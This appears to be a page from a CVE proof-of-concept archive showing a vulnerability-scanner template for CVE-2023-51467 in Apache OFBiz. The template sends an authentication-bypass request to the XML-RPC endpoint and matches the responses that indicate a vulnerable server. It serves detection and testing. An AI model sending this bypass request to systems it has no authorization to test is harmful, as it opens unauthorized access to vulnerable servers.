4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-51467.yaml YAML
id: CVE-2023-51467

info:
  name: Apache OFBiz XML-RPC Java Deserialization
  author: dwisiswant0
  severity: medium

  # This temaplte detects a Java deserialization vulnerability in Apache
  # OFBiz's bypass authenticated XML-RPC endpoint /webtools/control/xmlrpc for
  # versions prior to 17.12.04.

requests:
  - raw:
      - |
        POST /webtools/control/xmlrpc?USERNAME&PASSWORD=mdtest&requirePasswordChange=Y HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "faultString"
          - "No such service [ProjectDiscovery]"
          - "methodResponse"
        condition: and
        part: body
      - type: word
        words:
          - "Content-Type: text/xml"
        part: header
      - type: status
        status:
          - 200